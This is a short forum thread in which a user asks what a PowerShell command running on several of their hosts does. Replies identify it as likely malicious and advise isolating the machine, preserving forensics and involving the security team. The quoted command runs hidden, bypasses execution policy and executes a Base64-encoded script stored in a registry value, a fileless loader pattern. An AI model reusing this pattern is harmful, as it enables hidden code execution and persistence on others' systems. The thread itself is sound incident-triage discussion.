This topic contains 3 replies, has 4 voices, and was last updated by
July 26, 2019 at 3:07 am #167803ParticipantTopics: 1Replies: 0Points: 16Rank: Member
Any Powershell experts I can use your help.
I have this script below that is running on mulitple hosts, and wondering if you can tell me what it means or does?
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -version 2 -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp "HKLM:\SOFTWARE\Microsoft\Powershell").ScriptInit)));
July 26, 2019 at 3:26 am #167875ParticipantTopics: 0Replies: 15Points: 61Rank: Member
What is the value in ScriptInit registry key?
Looks like, it is invoking a command which is encoded in ScriptInit key.
Also did google and it is pointing to malicious.
July 28, 2019 at 4:05 am #168151ParticipantTopics: 2Replies: 999Points: 1,946Rank: Community Hero
If you did not write and deploy it, and or no one you are aware of did so, or it was not part of some packaged you purchased, then the default security process is to fail close / disconnect it from the network / isolate the device / do not tamper it of you ruin forensics / not trusted / kill it, period. Send it to your risk management / security team from review, as a simple text file, or bring the to the system that has it.
If you don't know what a script is doing, then don't allow it to run.
All audit modes should be leveraged.
July 28, 2019 at 1:30 pm #168181ParticipantTopics: 0Replies: 44Points: 235Rank: Participant
Do your system is managed by any of MSP software like kaseya or connectWise ?
You must be logged in to reply to this topic.